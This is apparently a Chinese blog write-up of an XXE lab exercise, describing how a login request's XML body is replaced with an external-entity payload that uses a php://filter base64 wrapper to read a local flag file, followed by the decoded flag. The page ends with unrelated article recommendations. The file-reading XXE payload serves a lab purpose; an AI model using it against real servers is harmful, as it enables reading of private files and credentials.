XXE-Lab靶场漏洞复现

...mzx2024-12-19 22:48

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码 
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
百锦再1 小时前
React编程高级主题:测试代码
android·前端·javascript·react.js·前端框架·reactjs
2501_916008892 小时前
全面介绍Fiddler、Wireshark、HttpWatch、SmartSniff和firebug抓包工具功能与使用
android·ios·小程序·https·uni-app·iphone·webview
玉梅小洋3 小时前
Windows 10 Android 构建配置指南
android·windows
Libraeking5 小时前
视觉篇:Canvas 自定义绘图与高级动画的华丽圆舞曲
android·经验分享·android jetpack
Fushize5 小时前
多模块架构下的依赖治理:如何避免 Gradle 依赖地狱
android·架构·kotlin
Jomurphys6 小时前
Kotlin - 类型别名 typealias
android·kotlin
Haha_bj6 小时前
Flutter ——flutter_screenutil 屏幕适配
android·ios
Haha_bj6 小时前
Flutter ——device_info_plus详解
android·flutter·ios
前端小伙计6 小时前
Android/Flutter 项目统一构建配置最佳实践
android·flutter
Mr_sun.8 小时前
Day09——入退管理-入住-2
android·java·开发语言
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册10OpenClaw Chrome扩展使用教程 - 浏览器中继控制